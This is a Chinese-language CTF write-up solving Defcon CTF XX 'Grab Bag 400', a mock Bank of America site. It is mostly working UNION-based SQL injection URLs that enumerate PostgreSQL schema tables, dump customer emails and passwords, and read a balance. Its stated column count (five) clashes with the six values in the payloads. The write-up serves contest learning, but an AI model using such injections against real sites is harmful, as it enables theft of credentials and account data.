Defcon CTF XX Grab Bag 400 Solution

Defcon CTF XX Grab Bag 400 Solution

By fqj1994

这个题模拟了一个Bank of America的网站

要求查找Jeff Moss(注:大名鼎鼎的defcon/blackhat创始人)的余额

首先,在zip code查询的地方发现可以注入。

然后,可以发现数据库是使用的PostgreSQL

接下来,可以用union select进行测试,可以发现

select应该返回5行,类型分别是str, str, str, num, str

显示所有的列可以使用如下的地址:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=430074%20union%20select%20table_name,column_name,’c’,’d’,1,’f’%20from%20information_schema.columns&Submit.x=14&Submit.y=14

显示所有schema为public的表可以使用如下的地址:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=430074%20union%20select%20table_name,table_schema,’c’,’d’,1,’f’%20from%20information_schema.tables%20where%20table_schema=’public’&Submit.x=14&Submit.y=14

显示所有客户可以使用如下的地址:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=430074%20union%20select%20email,password,username,lastname,id,firstname%20from%20customer&Submit.x=14&Submit.y=14

但是,你找不到Jeff Moss这个人,QQ群中沟通之后,

通过Google得知,Jeff Moss的Hacker Name又叫Dark Tangnet

于是找到Dark Tangnet的id是203

于是,可以查询他的余额了:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=430074%20union%20select%20’a’,’b’,’c’,’d’,balance,’f’%20from%20account%20where%20id=203%20and%20balance%20%3E=%200&Submit.x=14&Submit.y=14

得到答案是0。

但是,0是错误的!!!!

坑爹吧。。。。。。。。。。。。。。。。。。。

应该用浮点数。

最终的答案是0.00

此条目发表在技术报告分类目录。将固定链接加入收藏夹。

Defcon CTF XX Grab Bag 400 Solution》有 1 条评论

  1. laterain说:

    想问一下,假如过滤掉 ‘

    你会整么注入?